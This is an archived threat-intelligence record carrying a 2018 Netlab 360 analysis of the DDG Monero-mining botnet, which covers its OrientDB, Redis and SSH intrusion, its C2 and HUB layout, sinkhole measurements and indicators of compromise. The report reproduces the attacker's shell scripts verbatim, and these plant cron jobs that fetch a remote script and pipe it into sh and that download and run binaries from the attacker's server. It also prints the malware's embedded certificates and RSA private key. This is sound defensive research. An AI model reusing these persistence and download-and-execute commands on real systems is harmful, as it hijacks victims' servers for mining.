{
	"id": "9b94baa8-f84f-4aad-bd4d-e340fcb3de2e",
	"created_at": "2026-04-06T00:08:20.701442Z",
	"updated_at": "2026-04-10T13:12:56.583508Z",
	"deleted_at": null,
	"sha1_hash": "dd032ccc8d47cdb809068149057c9800187fc76a",
	"title": "DDG: A Mining Botnet Aiming at Database Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 762904,
	"plain_text": "DDG: A Mining Botnet Aiming at Database Servers\r\nBy JiaYu\r\nPublished: 2018-02-01 · Archived: 2026-04-05 16:16:10 UTC\r\nStarting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis\r\nfound that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it\r\nDDG.Mining.Botnet after its core function module name DDG.\r\nCurrently we are able to confirm that the botnet has mined more than 3,395 Monroe coins, equivalent to USD 925,383 at\r\ncurrent prices. In addition, there is another 2,428 XMRs (equivalent to USD 661,759) we have yet to fully confirm due to\r\nthe mining pool's payment record issue. This makes DDG by far the second largest Monroe related botnet we have seen, just\r\nbehind the MyKings Botnet we reported earlier.\r\nDDG code appears at least late in 2016 and is continuously updated throughout 2017.\r\nDDG uses a C2 and HUB layout to communicate with its clients. The HUB is a set of IPs and domain names that are used to\r\nprovide Miner program for the compromised clients to download.\r\nIt is worth noting that we were able to successfully register and sinkhole two domain names used by its v2011 version, thus\r\nwe were able to have a good understanding of the size of the entire DDG botnet based on Sinkhole data.\r\nDDG Mining Botnet Total Incoming\r\nDDG uses the following mine pool:\r\nhttps://monero.crypto-pool.fr/\r\nThree wallet addresses have been used, as follows:\r\nWallet #1\r\n4AxgKJtp8TTN9Ab9JLnvg7BxZ7Hnw4hxigg35LrDVXbKdUxmcsXPEKU3SEUQxeSFV3bo2zCD7AiCzP2kQ6VHouK3Kwn\r\nWallet #2\r\n45XyPEnJ6c2STDwe8GXYqZTccoHmscoNSDiTisvzzekwDSXyahCUmh19Mh2ewv1XDk3xPj3mN2CoDRjd3vLi1hrz6imWB\r\nWallet #3\r\n44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxu\r\nAmong them, Wallet#3 was the first wallet address been used, most active between the time period 2017-02~2017-03; then\r\nfollowed by Wallet#1, been used most of the 2017; Wallet#2 is a recent active one first seen on 2018-01-03.\r\nThe pool allows us to check the payment record of the wallets. The income of all three wallets is shown in the following\r\ntable. The total income is Monroe 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is\r\nan issue for the second wallet, where \"Total Paid\" is not consistent with the summary of all tractions' amount. We cannot\r\nconfirm which number is more accurate, so we show both numbers here.\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 1 of 14\n\nDDG Mining Botnet Workflow\r\nBy analyzing the sample and its behavior, we can characterize the DDG Mining Botnet attack as follows:\r\nIn the picture above, DDG Mining Botnet attack process can be divided into several stages:\r\nInitial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops\r\nthe attack payload\r\nStage 1: Attackers modify local Crontab scheduled tasks, download and execute i.sh (hxxp:\r\n//218.248.40.228:8443/i.sh) on the primary server and keep it synchronized every 5 minutes\r\nStage 2: DDG traverses the built-in file hub_iplist.txt, check the connectivity of every single entry and try to\r\ndownload the corresponding Miner program wnTKYg from the one can be successfully connected (wnTKYg.noaes if\r\nthe native CPU does not support AES-NI)\r\nMining Stage: The Miner program begins to use the computing resources of the compromised host to begin mining\r\nfor the attacker's wallet.\r\nThe HUB used in the second phase is a very interesting design. The attacker goes over all IPs and domain names written in\r\nthe HUB file to download the mining program, so as to avoid the possible blocking caused by using a single download\r\nserver. We observe that DDG operators update the IP and domain names of these HUB from time to time, and most of these\r\nips and domains are hacked boxes. See the entire HUB list at the end.\r\nIn v2011, somehow two domain names out of three on the list were left unregistered, so we went ahead and registered them,\r\nas follows.\r\ndefaultnotepad567[.]com\r\nunains1748[.]com unregistered\r\n5dba35bsmrd[.]com unregistered\r\nBelow we will introduce the DDG botnet C2s, HUB, and Bot respectively.\r\nThe C2s\r\nThe DDG botnet uses the following C2 to maintain control of the device:\r\n202.181.169.98:8443/i.sh\r\n218.248.40.228:8443/i.sh\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 2 of 14\n\nThe first C2 was only used by this botnet briefly. And the second C2 has been pretty much the only active C2 for the last two\r\nyears.\r\nThe HUB and Our Sinkhole\r\nDDG botnet uses HUB_IP: 8443\\wnTKYg to provide miner program. The detailed list of the two versions of HUB we\r\nmonitored is given in the IoC section at the end of this article. The country distribution is shown in the following table. Most\r\nof the victims can be seen in China.\r\nAs we mentioned before, DDG bot will go over and check connectivity of every single one of the IPs and domain names on\r\nthe hub list, which means we were able to get a very accurate infected clients list by sinkhole the above two domains.\r\nThe DDG operators noticed this after about 20 days and subsequently released an updated version of DDG code that\r\nreplaced all IPs and domain names, including our Sinkholed domains. But the time is long enough for us to have some good\r\nmeasurement of this botnet.\r\nUse Sinkhole Data to Measure DDG Mining Botnets\r\nFrom the sinkhole data, we recorded a total of 4,391 IP addresses of victims from all countries, with the most\r\nprominent victims being China (73%) and the United States (11%):\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 3 of 14\n\nAnd the following diagram shows the overall trend of the victim's DNS requests for the above two domains.\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 4 of 14\n\nTo avoid abuse, the list of all victims IP is not made public.\r\nA DNSMon Perspective\r\nOur DNSMon is also aware of these three domain names, the traffic access patterns of these 3 domains match very well as\r\ncan be seen from the first diagram:\r\nAnd the second diagram show that these 3 domains have very strong correlations.\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 5 of 14\n\nDDG Mining Botnet Attack Process Breakdown\r\nInitial Scanning\r\nThe scanning and intrusion phase of DDG Mining Botnet is done by sample ss2480.2. The ss2408.2 scans port 2480 and\r\nthen uses the OrientDB RCE Vulnerability CVE-2017-11467 to implement the intrusion.\r\nss2480.2 will first scan the internal network, and then scan the public network segment. The internal target IP ranges are:\r\n10.Y.x.x/16 (Y is the value of the current intranet IP B segment)\r\n172.16.x.x/16\r\n192.168.x.x/16\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 6 of 14\n\nAfter the internal networks scan, ss2480.2 visits hxxp://v4.ident.me to get a public IP address of the current host WAN_IP ,\r\nthen using WAN_IP/8 to generate public Target IP ranges. All the reserved address segments will be filtered:\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 7 of 14\n\nStage 1\r\nHere is the main configuration URL of DDG, the IP 218.248.40.228 is located in India, AS9829:\r\nhxxp://218.248.40.228:8443/i.sh\r\nThis i.sh has changed many times, but the content is more or less the same, below is an early version, with following main\r\nfunctions:\r\nSynchronize local Crontab with i.sh from the C2 server\r\nDownload and execute DDG sample from the C2 server\r\nCheck and clear the old version of the local DDG process\r\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh\" \u003e /var/spool/cron/root\r\nmkdir -p /var/spool/cron/crontabs\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh\" \u003e /var/spool/cron/crontabs/root\r\nif [ ! -f \"/tmp/ddg.2011\" ]; then\r\n curl -fsSL http://218.248.40.228:8443/2011/ddg.$(uname -m) -o /tmp/ddg.2011\r\nfi\r\nchmod +x /tmp/ddg.2011 \u0026\u0026 /tmp/ddg.2011\r\n#if [ ! -f \"/tmp/ss2480.2\" ]; then\r\n #curl -fsSL http://218.248.40.228:8443/ss2480.2 -o /tmp/ss2480.2\r\n#fi\r\n#chmod +x /tmp/ss2480.2 \u0026\u0026 /tmp/ss2480.2\r\nps auxf | grep -v grep | grep ss2480.1 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ss22522.1 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ss22522.2 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.1010 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.1021 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2001 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2003 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2004 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2005 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2011 || rm -rf /tmp/ddg.2011\r\nThe i.sh script gives attacker very flexible control to deliver any malicious software to the compromised host. And we did\r\nsee this file change from time to time to serve new Trojan files or to deliver malware that incorporates new attacks. For\r\nexample:\r\nDDG Samples: the ddg.$(uname -m) series. This the long-run payload, we have seen three version, V2011, V2020\r\nand V2021\r\nss22522 Samples: Only work for a short period, against the Struts2 vulnerability S2-052\r\nss2480 Samples: Also for a short period too, against OrientDB RCE. This is the very sample exposed DDG to us\r\nBy the way there is an issue in early version of i.sh, where a \"xargs\" is missing just ahead of 'kill' command, so the older\r\nprocess will not get killed as intended. This issue is fixed in later version.\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 8 of 14\n\nOn 2018.1.3, the attacker pushed out the newest version of i.sh (v2021.2), adding another mining process imWBR1 , which\r\nuses the second XMR wallet listed earlier:\r\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh\" \u003e /var/spool/cron/root\r\necho \"*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh\" \u003e\u003e /var/spool/cron/root\r\nmkdir -p /var/spool/cron/crontabs\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh\" \u003e /var/spool/cron/crontabs/root\r\necho \"*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh\" \u003e\u003e /var/spool/cron/crontabs/root\r\nif [ ! -f \"/tmp/ddg.2021\" ]; then\r\n curl -fsSL http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021\r\nfi\r\nif [ ! -f \"/tmp/ddg.2021\" ]; then\r\n wget -q http://218.248.40.228:8443/2021/ddg.$(uname -m) -O /tmp/ddg.2021\r\nfi\r\nchmod +x /tmp/ddg.2021 \u0026\u0026 /tmp/ddg.2021\r\nif [ ! -f \"/tmp/imWBR1\" ]; then\r\n curl -fsSL http://218.248.40.228:8443/imWBR1 -o /tmp/imWBR1 --compressed\r\nfi\r\nps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill\r\n#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill\r\nStage 2\r\nAt this phase, DDG tries to test all the hosts in the hub_iplist.txt, and if success DDG will visit\r\nhxxp://hub_ip:8443/wnTKYg to download and execute the corresponding program wnTKYg Miner (if the native CPU\r\ndoes not support AES-the NI , it will download wnTKYg.noaes).\r\nAll the ddg.xxx and ss2480.xxx were written in Golang. DDG communicate to the HUB with a third party Golang Stream\r\nMultiplexing library Smuxcompleted. The default Smux configuration is been used.\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 9 of 14\n\nSo after DDG downloads Miner from the HUB and starts to KeepAlive, it sends 2 packets to the connected HUB IP every\r\n10s:\r\nThe Built-in Hub_iplist.txt\r\nThe original DDG sample download URL is hxxp://218.248.40.228:8443/2011/ddg.$(uname -m), as written in i.sh. There\r\nare 158 hub_ip:8443 and 3 hub_domain:8443 listed in the hub_iplist, two of which are unregistered and then registered by\r\nus.\r\nOn 2017-11-10 We found that there is a change in the contents of i.sh file, ddg sample download link has changed to\r\nhxxp://218.248.40.228:8443/2020/ddg.$(uname -m). The attacker replaced all HUP IPs and domain names including ours.\r\nThe latest contents of hub_iplist.txt can be seen at the bottom of this blog ip_hublist (v2020 ~ v2021) .\r\nDDG Mining Botnet Also Targeted Redis Database and SSH Service\r\nThe above analysis focuses on the OrientDB exploit (ss2480 series).\r\nIn fact, the DDG samples also target SSH and Redis services as well, which are another two major methods used by DDG to\r\ncompromise vulnerable hosts. Some of the related functions and the password dictionary are shown in the following two\r\nfigures:\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 10 of 14\n\nThe victim is also implanted with the X509 key files. Three key files built into the sample are as follows, details at the end\r\nof the article:\r\n1. slave.pem\r\n2. ca.pem\r\n3. slave.key\r\nLooking at historical data, we can also see the i.sh host 218.248.40.228 scanning the Redis database early on. A google\r\nsearch turned up some posts complaining their server was infested with ddg botnet. The following diagram shows the ports\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 11 of 14\n\nthat were scanned by 218.248.40.228 between 2017-09-27 20:00:00 ~ 2017-10-25 11:00:00. Port\r\n6379, 7379 and 2480 represents Redis, Redis (Replicas) and OrientDB:\r\nOne more thing\r\nStarting from 2018.1.25 at 21 o'clock (GMT+8), we saw another update of this botnet, with link\r\nhxxp://218.248.40.228:8443/2011/ddg.x86_64, and this time it deliveries a Mirai family sample.\r\nFamily : mirai\r\nC2 : linuxuclib.com:8080\r\nC2 : jbeupq84v7.2y.net, no IP address associated yet\r\nMD5 : cbc4ba55c5ac0a12150f70585af396dc\r\nIoC\r\nC2:\r\n202.181.169.98:8443\r\n218.248.40.228:8443\r\nlinuxuclib.com:8080\r\njbeupq84v7.2y.net\r\nSamples' MD5:\r\nb1201bf62f3ca42c87515778f70fd789 ddg.i686 --\u003e v2011\r\n7705b32ac794839852844bb99d494797 ddg.x86_64 --\u003e v2011\r\n1970269321e3d30d6b130af390f2ea5c ddg.i686 --\u003e v2020\r\n5751440a2b3ce1481cf1464c8ac37cbe ddg.x86_64 --\u003e v2020\r\nf52f771c5b40a60ce344d39298866203 ddg.i686 --\u003e v2021\r\n3ea75a85bab6493db39b1f65940cc438 ddg.x86_64 --\u003e v2021\r\nb0c6cefa1a339437c75c6b09cefeb2e8 ss2480.1\r\n8c31b6379c1c37cf747fa19b63dd84a1 ss2480.2\r\n4fc28b8727da0bcd083a7ac3f70933fa ss22522.2\r\nd3b1700a413924743caab1460129396b wnTKYg\r\n8eaf1f18c006e6ecacfb1adb0ef7faee wnTKYg.noaes\r\n9ebf7fc39efe7c553989d54965ebb468 imWBR1\r\nSample Downloading URL\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 12 of 14\n\nhxxp://218.248.40.228:8443/2011/ddg.i686\r\nhxxp://218.248.40.228:8443/2011/ddg.x86_64\r\nhxxp://218.248.40.228:8443/2020/ddg.i686\r\nhxxp://218.248.40.228:8443/2020/ddg.x86_64\r\nhxxp://218.248.40.228:8443/2021/ddg.i686\r\nhxxp://218.248.40.228:8443/2021/ddg.x86_64\r\nhxxp://218.248.40.228:8443/i.sh\r\nhxxp://218.248.40.228:8443/ss22522.2\r\nhxxp://218.248.40.228:8443/ss2480.1\r\nhxxp://218.248.40.228:8443/ss2480.2\r\nhxxp://218.248.40.228:8443/wnTKYg\r\nhxxp://202.181.169.98:8443/2011/ddg.i686\r\nhxxp://202.181.169.98:8443/2011/ddg.x86_64\r\nhxxp://202.181.169.98:8443/i.sh\r\nhxxp://202.181.169.98:8443/ss22522.2\r\nhxxp://202.181.169.98:8443/ss2480.1\r\nhxxp://202.181.169.98:8443/ss2480.2\r\nhxxp://202.181.169.98:8443/wnTKYg\r\nhxxp://218.248.40.228:8443/imWBR1\r\nip_hublist(v2011): ip_hublist__2011.txt\r\nip_hublist(v2020~v2021): ip_hublist__2020.txt\r\nThree Key files\r\nslave.pem\r\n-----BEGIN CERTIFICATE-----\r\nMIICozCCAYsCCQDFoT3X3cNwiDANBgkqhkiG9w0BAQsFADATMREwDwYDVQQDDAh3\r\nZS1hcy1jYTAeFw0xNzA3MTcwMTM2MjhaFw0yNzA3MTUwMTM2MjhaMBQxEjAQBgNV\r\nBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAN1w\r\n9s7u1BrQSxJEkqCkJLl+qnw4XPL+GgCimso6WWvie8gr3AFiSDUFMVsbOOlGVXJD\r\nCAaYStw6Wkn09cjAczNW9Ysq4EOurpGmCDdViftu+5zu2Zmz88p1/ta3BuytQlfE\r\nQll6IFjNLSPOAaIwaWcQFXN/OlCPJZ7wvdo5aXFgVkvFplXogQiFLdKn3PgtDiNy\r\nEZct1/GgkYkgMTiymGrhXyj6/Eca28IsTydwU5h2fkkAIwnYpyeeEdcxsLmmFmfE\r\nG5x1mNsmUPnvMU7/qULmchVJ16pne06rNREApbuhm/XrhaDjphK8CNbUDWNXCWIR\r\nSKUl5bMoq5XnrvKc98kCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAg/G9vqIRz4rC\r\nniH49gSwFzBhH9tCXyBtHj86WMb2hi9myzFGE4joMhWp7OK3lwWq18kbukPk0TBz\r\nN9Mxrvvr0REBMPa1Q7VAq5ouFHw4WcIyzi1Ksw0SmFjaRCGqJTWQnG8lz+aIN8NX\r\n/i1KBWPbrnZGFfLdcKUmKrIXt6I3S1kb3jhJvlTOTjfr/iPlAMjVE9+tdgmy0Bsh\r\nMon9ctFwFj0sLhkcuyXU33ItkX5am2qmG7ToCoUj855JEm06T6PSakRLvodAsZfp\r\nJmto1aFjT/7HS5ImcOrd1WWXU76cSZN5GENRcsIzmA3pq6dVKFfSwsAOMw5zQcTS\r\nuDpcOCRjJg==\r\n-----END CERTIFICATE-----\r\nca.pem\r\n-----BEGIN CERTIFICATE-----\r\nMIIC/DCCAeSgAwIBAgIJAK1DRcYUFowVMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV\r\nBAMMCHdlLWFzLWNhMB4XDTE3MDcxNzAxMzYyOFoXDTQ0MTIwMjAxMzYyOFowEzER\r\nMA8GA1UEAwwId2UtYXMtY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB\r\nAQCz6Iaprhnb68CEPCJzU1uCplIMQWuMtpuamV/M4T1G0A0qPHLsCPbnS+psuSwK\r\nTnp3XBDEdTbhm33/FfLXeEfEmJlVX4lJfPk7XPT/UwgJ1OgGVegxNndPd+FQf1oX\r\n5ePSEmGZQRy9gkRQtCpSmO11AO8bbZY+WhHzvb3VQmu6rBAVCnzhPmBBlXsoyJfI\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 13 of 14\n\noRVX5FEwCMZXuKHVd2N/Q8XBEFX6TGICEAwSCu69QYG7eFMleLgCxFRJ1xOXfPvD\r\nx++depGUDpR9PrsTQ6Oh3BIicuWHfj72tiooVW1mGG8yAqDfb1kBa5gq8jZM13Nx\r\ngK0aRbZiJFreFj8Ed05LlPdnAgMBAAGjUzBRMB0GA1UdDgQWBBRL9zCbPXsgyxFe\r\noZYZtZmjvAyqbDAfBgNVHSMEGDAWgBRL9zCbPXsgyxFeoZYZtZmjvAyqbDAPBgNV\r\nHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBFne95zt54uyUn2ZtdUUHH\r\nOh3ODsCx+hL4DWsyaVa1l9PTW1es58+VGPFr4JYKj5DDj1FebYW/k0DAt6G4ehVg\r\npfYW23lYbwfbs1gFKaUVX1gb0U0BsLlXGJ5dVlnY09Z3RGZ1nf0U6VgTbleDc/M6\r\nCax7dvyn2a+2BJLxl3QCUVye6PJw33Hjjl8xfMTEv3RKoxeYP0Prgrmmg/gmr7hs\r\ndoWJBMflCWmwZJKhtdYAKMkFnprNH4h8ryqsWeO928ZHbHbxej15Rv9BjXIg4XnF\r\ntEIvhZUJ3tj4OvK8X6hJf0ZsI/3H1ffvTHyIX4UnYgGqMFlHSBXMhOIiXed6+xsP\r\n-----END CERTIFICATE-----\r\nslave.key\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEA3XD2zu7UGtBLEkSSoKQkuX6qfDhc8v4aAKKayjpZa+J7yCvc\r\nAWJINQUxWxs46UZVckMIBphK3DpaSfT1yMBzM1b1iyrgQ66ukaYIN1WJ+277nO7Z\r\nmbPzynX+1rcG7K1CV8RCWXogWM0tI84BojBpZxAVc386UI8lnvC92jlpcWBWS8Wm\r\nVeiBCIUt0qfc+C0OI3IRly3X8aCRiSAxOLKYauFfKPr8RxrbwixPJ3BTmHZ+SQAj\r\nCdinJ54R1zGwuaYWZ8QbnHWY2yZQ+e8xTv+pQuZyFUnXqmd7Tqs1EQClu6Gb9euF\r\noOOmErwI1tQNY1cJYhFIpSXlsyirleeu8pz3yQIDAQABAoIBAQCTltbo1QVJWcqv\r\nQkT4DG7tsx6t7GMHEZUDF11Tq9Att6YIpDLeOUMnE27x6hLkZ5xLq6GNw7MhVUMY\r\nR8wJITum3C6LsugGNEbljGOtfbWZfz70Ob2OVAIIztwq/5H97PxqwsP2Hw+wIBAV\r\n7RfpoZqetnmVoRac2suYQ5xF9j3w8acpCZdU2jCvbMNADdOtCkXBXcD9nGU0d9dN\r\nZ+qajp7otDw1DbQ381x6YDEu0g9CJhXdVfqK0skOs9KTrATxLBw4u6UmIP7fNAoH\r\np9OXzp6gzzl4mLR05SWm1pcjuoqxL88wIPYtcfKo8Z4CxZhx2oPTiQ0JUiVHUvPh\r\nOZwu2GSBAoGBAPFscPODr2H4dFFKK6uYb2ZRY6WSOiL31o1LCZ3a4lDJS7fvncZK\r\nOiyG/RQIt0k68UQHNxte0VOHiaGqCaHlfikS/KN5WyQeaRmH+MKxp+atGvKXmURV\r\n+uWK37GCIDzqTDPtu9UiAxQOOJQZCvGh40lc35v2aJGKpkD4+IaEDpDXAoGBAOrP\r\nqpei2+DtwougNA9FTxS3Z34NCCIHT0rqoogZZirMy6M7LnUoWAgMIUjpENK7uxma\r\nnNEWagv5XrLmFbjC/UaTF5BR9CrX0orto2CNA2upN+7Y6wNnB1ed7sjLubDEPNXv\r\nJeZsoz4G7TDq9oXE54a8idFVePn8q1RdRvHOdYhfAoGAbMgqFO+vJPvonYBIMSec\r\neoQN3FsJKxx1ZnD7Qk+QTkqFfbnQY7qqf8nLWy2aOLsAX2DI6eJNe8/Eqj2N3Y8k\r\ny6ksgRR7hsjVHpXv9vpJ51z0mX7Jpsr/JFLw/HDfydLgxz1Ft4F91Zma0NB/5+TE\r\nHxhkAUiEUaAhzYDhquryDT0CgYAP0YOdiYQkh//mJhm7uaCVNbHMJRaaLEHkOyBN\r\n6OAgHAHP8kmz7M7ZY+/OGJ1ghPMay3arA0aLnfYKOUPXWZN0cK5Ss6KuTDHL2Cx8\r\ncaN8Wj8BYS2b4hH1jhcrAcZ1qRKsGttDxafNouvRstJ+uoAabJMgPhDTTnlASrRf\r\nz9fNIwKBgCM3UzxVsRyoYx7rpCQ7QSX6SHsM0cNjWDRw5aMziQmyI+sitwOPAVek\r\nO+XvIXIzdahNBhQQ0giFKWh/b7fq2aNB1J+5TtAcEFTFFk9LC3l/U7Mk0nhUsh6G\r\npEcsRlnc4GpFeelJtj/c1BHBbX7HSdB8osk3GDyUwX1KVlbxZ4dk\r\n-----END RSA PRIVATE KEY-----\r\nSource: https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 14 of 14\n\n  https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/    \nAnd the following diagram shows the overall trend of the victim's DNS requests for the above two domains.\n   Page 4 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/"
	],
	"report_names": [
		"ddg-a-mining-botnet-aiming-at-database-servers"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434100,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dd032ccc8d47cdb809068149057c9800187fc76a.pdf",
		"text": "https://archive.orkl.eu/dd032ccc8d47cdb809068149057c9800187fc76a.txt",
		"img": "https://archive.orkl.eu/dd032ccc8d47cdb809068149057c9800187fc76a.jpg"
	}
}